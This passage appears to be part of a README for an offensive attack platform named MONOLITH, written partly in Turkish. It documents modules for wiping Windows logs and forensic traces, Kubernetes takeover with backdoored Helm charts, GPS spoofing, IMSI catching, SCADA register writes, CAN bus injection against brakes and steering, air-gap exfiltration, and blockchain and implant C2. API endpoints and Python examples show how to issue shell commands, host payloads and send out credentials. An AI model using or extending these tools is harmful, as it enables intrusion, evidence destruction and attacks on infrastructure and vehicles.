│ 🔐 CREDENTIAL_THEFT PROFILE 🔥 FULL_CLEANUP PROFILE │
│ ├── Security Log Events: ├── ALL Security Events │
│ │ • 4624 (Logon Success) ├── ALL Sysmon Events │
│ │ • 4625 (Logon Failure) ├── ALL PowerShell Events │
│ │ • 4648 (Explicit Creds) ├── ALL Windows Defender │
│ │ • 4672 (Special Privileges) ├── ALL Application Events │
│ │ • 4768 (Kerberos TGT) ├── ALL System Events │
│ │ • 4769 (Kerberos Service) └── USN Journal + Prefetch │
│ │ • 4771 (Kerberos Pre-Auth) │
│ │ • 4776 (NTLM Validation) 💀 NUKE EVERYTHING │
│ │ ├── wevtutil cl Security │
│ ├── Sysmon Events: ├── wevtutil cl System │
│ │ • Event 1 (Process Create) ├── Clear all .evtx files │
│ │ • Event 10 (Process Access) ├── Delete Prefetch files │
│ │ • Event 13 (Registry) ├── Clear USN Journal │
│ │ • Event 17/18 (Pipe) └── Shred MFT entries │
│ └── PowerShell Events │
│ │
│ TECHNIQUES: │
│ ├── 🔇 Suspend EventLog service threads │
│ ├── 🔓 Patch ETW (Event Tracing for Windows) │
│ ├── 📝 Direct .evtx file manipulation │
│ ├── ☠️ Sysmon driver unload │
│ └── 🧹 Selective record deletion (keep log structure intact) │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /god-mode/ - God Mode Dashboard
GET /god-mode/api/phantom/suspicious-events - List suspicious events to clean
GET /god-mode/api/phantom/profile/{name} - Get cleanup profile
POST /god-mode/api/phantom/generate - Generate phantom cleaner script
POST /god-mode/api/timestomp/generate - Generate timestomp script
GET /god-mode/api/suspicious-files - Get files that need timestomping
### 🔗 God Mode Integration (12+ Modules)
God Mode Anti-Forensics şu modüllere entegre edilmiştir:
| Module | Integration |
|--------|-------------|
| C2 Implant | ✅ Toggle + Cleanup profiles |
| Lateral Movement | ✅ Auto-cleanup after spread |
| Golden Ticket | ✅ Kerberos log cleanup |
| DPAPI Extractor | ✅ Credential theft profile |
| Web Shell | ✅ Web activity cleanup |
| eBPF Rootkit | ✅ Kernel trace cleanup |
| WMI Persistence | ✅ WMI event cleanup |
| AutoExploit | ✅ Post-exploit cleanup |
| DLL Sideload | ✅ Loader trace cleanup |
| Supply Chain | ✅ CI/CD log cleanup |
| Mimikatz | ✅ LSASS access cleanup |
| SSH Worm | ✅ Auth log cleanup |
## 🔗 Cross-Module Integration
Tüm saldırı modülleri artık birbirine bağlı! Bir modülden diğerine tek tıkla geçiş.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔗 CROSS-MODULE INTEGRATION │
│ Seamless Attack Chain Workflow │
│ 20 Templates Interconnected │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ATTACK CHAIN EXAMPLE │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ AutoExploit ──► C2 Implant ──► Lateral Movement ──► Golden Ticket │
│ │ │ │ │ │
│ ▼ ▼ ▼ ▼ │
│ PrivEsc ◄────► DPAPI Extract ◄───► WMI Persist ◄────► God Mode │
│ │
│ INTEGRATED MODULES (20): │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ C2 Implant │ Lateral Movement │ Golden Ticket │ RDP Hijack │ │ │
│ │ SSH Worm │ DPAPI Extractor │ PrivEsc Toolkit │ AutoExploit │ │ │
│ │ WMI Persistence │ DLL Sideload │ Supply Chain │ WebShell │ │ │
│ │ AI Payload │ Cloud Pivot │ K8s Warfare │ Telegram C2 │ │ │
│ │ Stego C2 │ eBPF Rootkit │ Phishing Adv │ God Mode │ │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ QUICK ACTIONS: │
│ ├── 🚀 Deploy C2 to Target - One-click C2 deployment │
│ ├── 🔐 Dump Creds - Jump to credential extraction │
│ ├── 👻 Persist - Quick persistence options │
│ ├── ⬆️ PrivEsc - Privilege escalation check │
│ └── 💀 God Mode - Anti-forensics cleanup │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
## ☸️ K8s Kraken - Kubernetes Warfare (February 2026)
Container ve orchestration dünyasının hakimi! Kubelet exploit, Helm backdoor ve cluster domination.
### 🦑 K8s Kraken Module
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ ☸️ K8S KRAKEN │
│ Kubernetes Cluster Domination Suite │
│ tools/k8s_warfare.py (~1000 lines) │
│ CLUSTER TAKEOVER 🎯 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ KUBELET EXPLOITER │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ TARGET PORTS ATTACK VECTORS │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🔓 10250 - Kubelet API │ │ 📋 /pods - List all pods │ │
│ │ Anonymous auth check │ │ 🖥️ /run - Command execution │ │
│ │ │ │ 📁 /configz - Config dump │ │
│ │ 📊 10255 - Kubelet RO │ │ 🔍 /debug/pprof - Profiling │ │
│ │ Info disclosure │ │ │ │
│ │ │ │ TOKEN EXTRACTION: │ │
│ │ 💾 2379 - ETCD │ │ /var/run/secrets/kubernetes │ │
│ │ Cluster secrets │ │ .io/serviceaccount/token │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ EXPLOITATION FLOW: │
│ ┌─────────────────────────────────────────────────────────────────────────────────┐ │
│ │ 1. Scan for exposed Kubelet (10250) │ │
│ │ 2. Check anonymous authentication │ │
│ │ 3. List pods → Find privileged pods │ │
│ │ 4. Execute commands via /run endpoint │ │
│ │ 5. Extract service account tokens │ │
│ │ 6. Escalate to cluster-admin │ │
│ │ 7. Deploy persistent backdoor │ │
│ └─────────────────────────────────────────────────────────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ HELM BACKDOOR GENERATOR │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ CHART TEMPLATES PAYLOAD TYPES │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🕵️ coredns-metrics │ │ 🐚 Reverse Shell │ │
│ │ Stealth DNS monitoring │ │ Netcat/Bash callback │ │
│ │ │ │ │ │
│ │ 📊 prometheus-adapter │ │ 🔐 Token Harvester │ │
│ │ Metrics exfiltration │ │ Service account theft │ │
│ │ │ │ │ │
│ │ 📝 logging-operator │ │ 💀 Cryptominer │ │
│ │ Log collection backdoor │ │ Resource hijacking │ │
│ │ │ │ │ │
│ │ 📁 nfs-provisioner │ │ 🌐 Proxy Pivot │ │
│ │ Storage access │ │ SOCKS5 tunnel │ │
│ │ │ │ │ │
│ │ 🔒 cert-manager-webhook │ │ 📡 C2 Beacon │ │
│ │ TLS interception │ │ Persistent callback │ │
│ │ │ │ │ │
│ │ 🎯 kube-state-metrics │ │ ⬆️ Privilege Escalation │ │
│ │ Cluster state access │ │ Container escape prep │ │
│ │ │ │ │ │
│ │ 📈 metrics-server │ │ 📦 Custom Payload │ │
│ │ Resource monitoring │ │ User-defined code │ │
│ │ │ │ │ │
│ │ 🔧 cluster-autoscaler │ │ 🗝️ Secret Exfil │ │
│ │ Scaling manipulation │ │ Kubernetes secrets dump │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ STEALTH FEATURES: │
│ ├── 📛 Legitimate-looking names (kube-system namespace) │
│ ├── 🏷️ Kubernetes system labels │
│ ├── 📊 Resource limits (blend with normal pods) │
│ ├── 🔒 Service account restrictions │
│ └── 📝 Audit log evasion techniques │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ATTACK PLAYBOOK │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ PHASE 1: RECONNAISSANCE PHASE 2: INITIAL ACCESS │
│ ├── Kubelet port scan ├── Anonymous auth exploit │
│ ├── API server enumeration ├── Token theft from pods │
│ ├── ETCD exposure check ├── Misconfigured RBAC abuse │
│ └── Service account audit └── Cloud metadata access │
│ │
│ PHASE 3: PRIVILEGE ESCALATION PHASE 4: PERSISTENCE │
│ ├── Privileged pod creation ├── DaemonSet backdoor │
│ ├── Host PID/NET namespace ├── CronJob persistence │
│ ├── Node access via pods ├── Mutating webhook │
│ └── Cluster-admin escalation └── Malicious Helm release │
│ │
│ PHASE 5: LATERAL MOVEMENT KEY TARGETS │
│ ├── Pod-to-pod pivoting ├── ETCD (cluster secrets) │
│ ├── Service mesh abuse ├── API Server (full control) │
│ ├── ConfigMap secrets ├── Cloud IAM credentials │
│ └── Cross-namespace access └── Application databases │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /k8s-kraken/ - K8s Kraken Dashboard
GET /k8s-kraken/api/status - Module status
POST /k8s-kraken/api/scan-kubelet - Scan for vulnerable Kubelets
POST /k8s-kraken/api/exploit-kubelet - Exploit anonymous Kubelet
POST /k8s-kraken/api/list-pods - List pods via Kubelet API
POST /k8s-kraken/api/exec-command - Execute command in pod
POST /k8s-kraken/api/extract-token - Extract service account token
GET /k8s-kraken/api/helm-templates - List Helm backdoor templates
POST /k8s-kraken/api/generate-helm - Generate malicious Helm chart
GET /k8s-kraken/api/attack-playbook - Get K8s attack playbook
## 📡 Orbital & RF Warfare (February 2026)
Yörünge ve Radyo Frekans Savaşları - Software Defined Radio ile uydu ve RF sinyal istihbaratı. RTL-SDR ve HackRF ile profesyonel SIGINT operasyonları.
### 🛰️ Orbital RF Warfare Teknik Detayları
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🛰️ ORBITAL & RF WARFARE │
│ Software Defined Radio (SDR) Signal Intelligence Operations │
│ tools/orbital_rf_warfare.py (~1000 lines) │
│ 📡 "Gökyüzünden Dinle" 📡 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ SATCOM DOWNLINK SNIFFER GPS SPOOFING "NO-FLY ZONE" │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ 📡 SATELLITE SYSTEMS: 🎯 FEATURES (HackRF Required): │
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🛰️ IRIDIUM │ │ 🌍 Static Location Spoof │ │
│ │ 1621.25 MHz │ │ Set any GPS coordinates │ │
│ │ Pager, Voice, ACARS │ │ │ │
│ ├─────────────────────────────┤ ├─────────────────────────────┤ │
│ │ 📻 INMARSAT │ │ 🚗 Trajectory Spoof │ │
│ │ 1545.0 MHz │ │ Moving path simulation │ │
│ │ EGC, SafetyNET, NAVTEX │ │ │ │
│ ├─────────────────────────────┤ ├─────────────────────────────┤ │
│ │ 🌤️ NOAA APT │ │ 📍 FAMOUS LOCATIONS: │ │
│ │ 137.62 MHz │ │ • White House │ │
│ │ Weather satellite images │ │ • Kremlin │ │
│ ├─────────────────────────────┤ │ • Pentagon │ │
│ │ 🛳️ ORBCOMM │ │ • Area 51 │ │
│ │ 137.5 MHz │ │ • Forbidden City │ │
│ │ AIS ship tracking │ │ • Vatican │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ CAPTURED DATA TYPES: ⚠️ WARNING: GPS spoofing is │
│ • Ship coordinates & routes ILLEGAL without authorization! │
│ • Weather broadcasts Requires HackRF or TX-capable SDR │
│ • Pager messages │
│ • ACARS flight data │
│ • Safety navigation alerts │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ GSM IMSI CATCHER MONITOR SDR HARDWARE SUPPORT │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ 📱 PASSIVE IMSI COLLECTION: 🔧 SUPPORTED DEVICES: │
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ GSM BANDS: │ │ 📻 RTL-SDR (RX Only) │ │
│ │ │ │ 24-1766 MHz │ │
│ │ GSM850: 869-894 MHz │ │ Best for: SatCom, GSM │ │
│ │ GSM900: 935-960 MHz │ │ │ │
│ │ DCS1800: 1805-1880 MHz │ ├─────────────────────────────┤ │
│ │ PCS1900: 1930-1990 MHz │ │ 📡 HackRF One (TX/RX) │ │
│ └─────────────────────────────┘ │ 1-6000 MHz │ │
│ │ Best for: GPS Spoof │ │
│ 📊 ANALYSIS FEATURES: │ │ │
│ ├─────────────────────────────┤ │
│ • IMSI collection per cell tower │ 🖥️ BladeRF (TX/RX) │ │
│ • Provider identification (MCC/MNC) │ 300-3800 MHz │ │
│ • Density heatmap visualization │ High bandwidth ops │ │
│ • Country & carrier statistics └─────────────────────────────┘ │
│ • Export to JSON/CSV │
│ │
│ 📶 NO BASE STATION SPOOFING - │
│ Purely passive monitoring! │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
MCC/MNC DATABASE (Sample):
286-01: Turkey - Turkcell
286-02: Turkey - Vodafone TR
310-410: USA - AT&T
234-10: UK - O2
262-01: Germany - T-Mobile DE
208-01: France - Orange FR
460-00: China - China Mobile
440-10: Japan - NTT Docomo
250-01: Russia - MTS
### 🔗 Orbital RF Warfare API Endpoints
GET /orbital-rf/ - RF Warfare Dashboard
GET /orbital-rf/api/status - Module & hardware status
POST /orbital-rf/api/devices/detect - Detect connected SDR devices
POST /orbital-rf/api/devices/select - Select active SDR device
# SatCom Downlink Sniffer
GET /orbital-rf/api/satcom/systems - List satellite systems
POST /orbital-rf/api/satcom/start - Start satellite capture
POST /orbital-rf/api/satcom/stop - Stop capture
GET /orbital-rf/api/satcom/captures - Get captured data
GET /orbital-rf/api/satcom/stats - Capture statistics
GET /orbital-rf/api/satcom/stream - SSE live capture stream
# GPS Spoofing (HackRF Required)
GET /orbital-rf/api/gps/locations - Famous no-fly zone locations
GET /orbital-rf/api/gps/check-hardware - Check TX capability
POST /orbital-rf/api/gps/configure - Configure spoof parameters
POST /orbital-rf/api/gps/start - Start GPS transmission
POST /orbital-rf/api/gps/stop - Stop transmission
# GSM IMSI Catcher
GET /orbital-rf/api/gsm/bands - List GSM bands
POST /orbital-rf/api/gsm/scan - Scan for cell towers
POST /orbital-rf/api/gsm/start - Start IMSI monitoring
POST /orbital-rf/api/gsm/stop - Stop monitoring
GET /orbital-rf/api/gsm/records - Get IMSI records
GET /orbital-rf/api/gsm/analysis - Density analysis
GET /orbital-rf/api/gsm/export - Export data
GET /orbital-rf/api/gsm/stream - SSE live IMSI stream
POST /orbital-rf/api/quick-scan - Quick RF environment scan
### 💻 Python Usage Example
from tools.orbital_rf_warfare import get_orbital_rf_warfare, SatelliteSystem, GSMBand
# Initialize RF Warfare
warfare = get_orbital_rf_warfare()
# Check hardware status
status = warfare.get_status()
print(f"SDR Devices: {len(status['sdr_devices'])}")
print(f"TX Capable: {status['tx_ready']}")
# Start Iridium satellite capture
result = warfare.satcom_sniffer.start_capture(
satellite_system=SatelliteSystem.IRIDIUM,
duration_seconds=300,
live_feed_callback=lambda d: print(f"Captured: {d['decoded_content']}")
)
# GPS Spoofing (HackRF required!)
# Configure spoof to Area 51
warfare.gps_spoofer.generate_spoof_config(
location_name="area_51",
duration_seconds=60
)
# Start transmission
warfare.gps_spoofer.start_transmission()
# GSM IMSI Monitoring
warfare.gsm_monitor.start_monitoring(
band=GSMBand.GSM900,
duration_seconds=300
)
# Get captured IMSI records
records = warfare.gsm_monitor.get_imsi_records()
for record in records:
print(f"IMSI: {record['imsi']} | Provider: {record['provider']}")
# Density analysis
analysis = warfare.gsm_monitor.get_density_analysis()
print(f"Unique IMSI: {analysis['total_unique_imsi']}")
print(f"By Provider: {analysis['by_provider']}")
## 🏭 SCADA & ICS Hunter (February 2026)
Endüstriyel Kontrol Sistemleri (ICS) keşif ve saldırı modülü.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🏭 SCADA & ICS HUNTER │
│ Industrial Control System Attack Suite │
│ Critical Infrastructure Testing │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ SUPPORTED PROTOCOLS ATTACK VECTORS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🔌 MODBUS TCP/RTU │ │ 🔍 Device Discovery │ │
│ │ Port 502 │ │ Network scan, Shodan │ │
│ │ Read/Write Coils & Regs │ │ │ │
│ │ │ │ 💉 Register Manipulation │ │
│ │ 🌐 DNP3 (IEEE 1815) │ │ Write coils, holding regs│ │
│ │ Port 20000 │ │ │ │
│ │ SCADA Protocol │ │ 🎯 PLC Exploitation │ │
│ │ │ │ Logic injection, DoS │ │
│ │ 🔗 OPC-UA │ │ │ │
│ │ Port 4840 │ │ 📊 HMI Targeting │ │
│ │ Industrial IoT │ │ Screenshot, keylog │ │
│ │ │ │ │ │
│ │ ⚡ IEC 61850 │ │ 🔓 Auth Bypass │ │
│ │ Power grid protocol │ │ Default creds, brute │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ VENDOR SUPPORT: Siemens S7, Allen-Bradley, Schneider, ABB, GE, Honeywell │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /scada/ - SCADA Hunter Dashboard
POST /scada/api/scan - Scan for ICS devices
POST /scada/api/modbus/read - Read Modbus registers
POST /scada/api/modbus/write - Write Modbus registers
POST /scada/api/dnp3/scan - Scan DNP3 outstations
POST /scada/api/opcua/browse - Browse OPC-UA nodes
GET /scada/api/vendors - List known vendors
## 🚗 Automotive & CAN Bus Hacking (February 2026)
Araç içi ağ sistemleri ve CAN Bus saldırı modülü.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🚗 AUTOMOTIVE & CAN BUS │
│ Vehicle Network Attack Framework │
│ ECU Fuzzing & Exploitation │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ATTACK CAPABILITIES TARGET ECUs │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 📡 CAN Bus Sniffing │ │ 🚗 Engine Control Module │ │
│ │ Real-time traffic │ │ Throttle, fuel, ignition │ │
│ │ ID filtering │ │ │ │
│ │ │ │ 🎮 Steering System │ │
│ │ 💉 Packet Injection │ │ EPS control │ │
│ │ Arbitrary CAN frames │ │ │ │
│ │ Replay attacks │ │ 🚨 Brake System (ABS/ESP) │ │
│ │ │ │ Safety-critical │ │
│ │ 🔀 ECU Fuzzing │ │ │ │
│ │ Random/smart fuzzing │ │ 📻 Infotainment (IVI) │ │
│ │ Crash detection │ │ Bluetooth, WiFi │ │
│ │ │ │ │ │
│ │ 💀 CAN DoS │ │ 🔑 Immobilizer/PKES │ │
│ │ Bus-off attack │ │ Key fob, relay attack │ │
│ │ Dominant bit flooding │ │ │ │
│ │ │ │ 📍 Telematics/GPS │ │
│ │ 🔐 UDS Diagnostics │ │ Remote access │ │
│ │ Security access │ │ │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ HARDWARE: SocketCAN, CANtact, PCAN, Kvaser, Arduino + MCP2515 │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /automotive/ - Vehicle Ops Dashboard
POST /automotive/api/can/sniff - Start CAN sniffing
POST /automotive/api/can/inject - Inject CAN frame
POST /automotive/api/can/fuzz - Start ECU fuzzing
POST /automotive/api/can/dos - CAN DoS attack
POST /automotive/api/uds/scan - UDS service scan
GET /automotive/api/ecus - Known ECU database
## 🔌 Air-Gap Jumping (February 2026)
Hava boşluklu (izole) sistemlerden veri sızdırma modülü.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔌 AIR-GAP JUMPING │
│ Covert Exfiltration from Isolated Systems │
│ Bridging the Unbridgeable │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ EXFILTRATION CHANNELS SPECIFICATIONS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🔊 ULTRASONIC AUDIO │ │ Frequency: 18-22 kHz │ │
│ │ Inaudible to humans │ │ Range: ~5 meters │ │
│ │ Speaker → Microphone │ │ Speed: ~20 bps │ │
│ │ FSK modulation │ │ Detection: Very Low │ │
│ │ │ │ │ │
│ │ 💡 LED MORSE CODE │ │ Caps Lock, Scroll Lock, │ │
│ │ Keyboard LEDs │ │ Num Lock, HDD LED │ │
│ │ HDD activity LED │ │ Speed: ~10 bps │ │
│ │ Optical receiver │ │ Range: Line of sight │ │
│ │ │ │ │ │
│ │ 📡 ELECTROMAGNETIC │ │ CPU/RAM emanations │ │
│ │ TEMPEST-style │ │ Requires SDR receiver │ │
│ │ Side-channel leakage │ │ Range: ~10 meters │ │
│ │ │ │ │ │
│ │ 🌡️ THERMAL │ │ CPU heat modulation │ │
│ │ Heat patterns │ │ Thermal camera receiver │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ USE CASE: Exfil from nuclear facilities, military networks, SCADA systems │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /airgap/ - Air-Gap Dashboard
POST /airgap/api/ultrasonic/encode - Encode data for ultrasonic TX
POST /airgap/api/ultrasonic/decode - Decode received audio
POST /airgap/api/led/encode - Encode data for LED Morse
POST /airgap/api/led/generate-agent - Generate LED exfil agent
GET /airgap/api/channels - Available covert channels
### 💻 Python Usage Example
from tools.airgap_jumper import AirGapJumper
jumper = AirGapJumper()
# Ultrasonic exfiltration (inaudible audio)
result = jumper.encode_ultrasonic(
data="SECRET_DATA_HERE",
frequency=19000, # 19kHz - inaudible
encrypt=True
)
# Play the generated WAV file through speakers
# LED Morse exfiltration
led_agent = jumper.generate_led_agent(
data_to_exfil="credentials.txt",
led_type="capslock",
speed_wpm=15
)
# Deploy agent to air-gapped system
## ₿ Blockchain & Decentralized C2 (February 2026)
Kapatılamayan sunucular! Blockchain tabanlı Command & Control.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ ₿ BLOCKCHAIN & DECENTRALIZED C2 │
│ Unstoppable Command & Control Infrastructure │
│ "Devletler Bitcoin'i Kapatamaz" │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ C2 CHANNELS HOW IT WORKS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ ₿ BITCOIN OP_RETURN │ │ 1. Komutunu oluştur │ │
│ │ 80-byte data field │ │ 2. BTC transaction gönder │ │
│ │ Commands in blockchain │ │ 3. ~0.0001 BTC + fee öde │ │
│ │ Cost: ~$1 per command │ │ 4. Blockchain'e yazılır │ │
│ │ Latency: ~10 min │ │ 5. Ajanlar blockchain izler │ │
│ │ │ │ 6. Komut alınır & çalışır │ │
│ │ 🐕 DOGECOIN/LITECOIN │ │ │ │
│ │ Cheaper alternatives │ │ Avantajlar: │ │
│ │ Same OP_RETURN method │ │ • Takedown imkansız │ │
│ │ │ │ • Ajan sunucuya bağlanmaz │ │
│ │ 🌐 IPFS HOSTING │ │ • Komutlar kalıcı │ │
│ │ Decentralized storage │ │ • Sansürlenemez │ │
│ │ Content-addressed │ │ │ │
│ │ Multiple gateways │ │ IPFS Gateways: │ │
│ │ Uncensorable payloads │ │ • ipfs.io │ │
│ │ │ │ • cloudflare-ipfs.com │ │
│ │ Ξ ETHEREUM CONTRACTS │ │ • dweb.link │ │
│ │ Smart contract C2 │ │ • gateway.pinata.cloud │ │
│ │ Solidity-based │ │ │ │
│ └─────────────────────────────┘ └─────────────────────────────┘ │
│ │
│ ENCODING: FSK modulation, XOR encryption, Base64 │
│ NETWORKS: BTC Mainnet, BTC Testnet, Dogecoin, Litecoin, Ethereum │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /blockchain-c2/ - Blockchain C2 Dashboard
POST /blockchain-c2/api/bitcoin/create-command - Generate OP_RETURN command
POST /blockchain-c2/api/bitcoin/generate-agent - Bitcoin watching agent
POST /blockchain-c2/api/ipfs/upload - Upload payload to IPFS
POST /blockchain-c2/api/ipfs/generate-stager - IPFS stager code
GET /blockchain-c2/api/ethereum/contract - Get smart contract code
POST /blockchain-c2/api/ethereum/generate-agent - Ethereum agent
POST /blockchain-c2/api/full-agent - Multi-channel agent
GET /blockchain-c2/api/methods - Available C2 methods
### 💻 Python Usage Example
from tools.blockchain_c2 import DecentralizedC2, CommandType
c2 = DecentralizedC2()
# Create Bitcoin OP_RETURN command
result = c2.create_bitcoin_command(
command_type=CommandType.SHELL,
payload="whoami && hostname",
encrypt=True,
network="testnet"
)
print(f"OP_RETURN HEX: {result['op_return_hex']}")
# Paste this hex into your Bitcoin wallet's OP_RETURN field
# Upload payload to IPFS (decentralized hosting)
ipfs_result = c2.upload_to_ipfs(
content="#!/usr/bin/env python3\\nimport os; os.system('whoami')",
filename="payload.py",
encrypt=True
)
print(f"CID: {ipfs_result['cid']}")
print(f"Gateways: {ipfs_result['gateways']}")
# Generate multi-channel agent
agent = c2.generate_full_agent(
methods=["bitcoin", "ipfs", "ethereum"],
watch_address="1YourBTCAddressHere..."
)
# Deploy agent - it will monitor blockchain for commands
## 📡 C2 Implant Framework
MONOLITH includes a production-grade C2 system with multiple transport channels, implant agents (Python, Go, Rust), and decentralized options (blockchain, IPFS, Tor). The framework supports traditional HTTP/S beacons, DNS-over-HTTPS covert channels, Telegram/Discord bot C2, steganographic image-based C2, and blockchain-based command & control using Ethereum and Bitcoin testnets.
**Transport Channels:**
- **HTTP/S Beacon** — Classic beacon with configurable sleep, jitter, and kill dates.
- **DNS-over-HTTPS (DoH)** — Covert C2 over encrypted DNS queries; blends with normal traffic.
- **Telegram / Discord Bot** — C2 via popular chat platforms using bot tokens.
- **Steganography** — Commands embedded in image files served via CDN.
- **Blockchain (ETH/BTC)** — Commands stored on-chain via OP_RETURN or smart contracts; agents watch wallets for instructions.
- **IPFS / Decentralized** — Payload hosting and retrieval via InterPlanetary File System.
**Implant Features:**
- Auto-reconnect with exponential backoff
- In-memory execution (fileless)
- Process injection & hollowing
- Syscall obfuscation (indirect syscalls, syswhispers)
- Sleep masking (PoC/Rust)
- AMSI/ETW bypass
- Keylogging, screenshots, clipboard theft
- Lateral movement (WMIExec, SMB, RDP)
- Privilege escalation checks
Gelişmiş Command & Control implant yönetim sistemi.
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 📡 C2 IMPLANT FRAMEWORK │
│ Multi-Platform Command & Control System │
│ Fully Integrated Attack Platform │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ PAYLOAD TYPES FEATURES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🐍 Python Beacon │ │ 🔄 Auto-reconnect │ │
│ │ Cross-platform │ │ ⏱️ Configurable sleep/jitter│ │
│ │ │ │ 🔐 Encrypted communications │ │
│ │ 💠 PowerShell Implant │ │ 📁 File upload/download │ │
│ │ Windows native │ │ 🖥️ Screenshot capture │ │
│ │ │ │ ⌨️ Keylogging │ │
│ │ 🔷 C# Agent │ │ 🌐 Proxy support │ │
│ │ .NET Framework │ │ 💀 God Mode integration │ │
│ │ │ │ │ │
│ │ 🐚 Bash Implant │ │ INTEGRATIONS: │ │
│ │ Linux/macOS │ │ ├── DLL Sideload │ │
│ └─────────────────────────────┘ │ ├── WMI Persistence │ │
│ │ ├── Lateral Movement │ │
│ COMMUNICATION CHANNELS │ ├── Supply Chain │ │
│ ┌─────────────────────────────┐ │ ├── Golden Ticket │ │
│ │ 🌐 HTTP/HTTPS │ │ └── DPAPI Extractor │ │
│ │ ✈️ Telegram Bot │ └─────────────────────────────┘ │
│ │ 💬 Discord Webhook │ │
│ │ 🖼️ Steganography │ │
│ │ 🔗 DNS over HTTPS │ │
│ └─────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /c2/ - C2 Dashboard
GET /c2/api/agents - List connected agents
POST /c2/api/generate - Generate implant payload
POST /c2/api/task - Send task to agent
GET /c2/api/results - Get task results
POST /c2/api/quick-deploy - Deploy module to agent
## 📊 Statistics
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 📊 PROJECT STATISTICS │
└─────────────────────────────────────────────────────────────────────────────────────────┘
Total Lines of Code: ~65,000+
Python Modules: 70+
HTML Templates: 86+
API Endpoints: 150+
Attack Techniques: 250+
Evasion Methods: 60+
MITRE ATT&CK Coverage: 14 Tactics, 120+ Techniques
Core Components:
├── cybermodules/ ~22,000 lines
├── evasion/ ~8,500 lines
├── cyberapp/routes/ ~7,500 lines
├── templates/ ~22,000 lines
└── tools/ ~5,000 lines
NEW in v2.5 (February 2026):
├── God Mode Anti-Forensics: ~900 lines + 12 template integrations
├── Cross-Module Integration: 20 templates interconnected
├── K8s Kraken (Kubernetes): ~1,000 lines
├── Orbital RF Warfare: ~1,000 lines (SatCom, GPS Spoof, IMSI)
├── SCADA & ICS Hunter: ~800 lines (Modbus, DNP3, OPC-UA)
├── Automotive CAN Bus: ~700 lines (ECU, DoS, Fuzzing)
├── Air-Gap Jumping: ~600 lines (Ultrasonic, LED Morse)
├── Blockchain C2: ~700 lines (Bitcoin, IPFS, Ethereum)
├── Telegram/Discord C2: ~650 lines
├── Stego C2: ~550 lines
├── eBPF Rootkit: ~800 lines
├── SSH Worm: ~700 lines
├── Docker Escape: ~700 lines
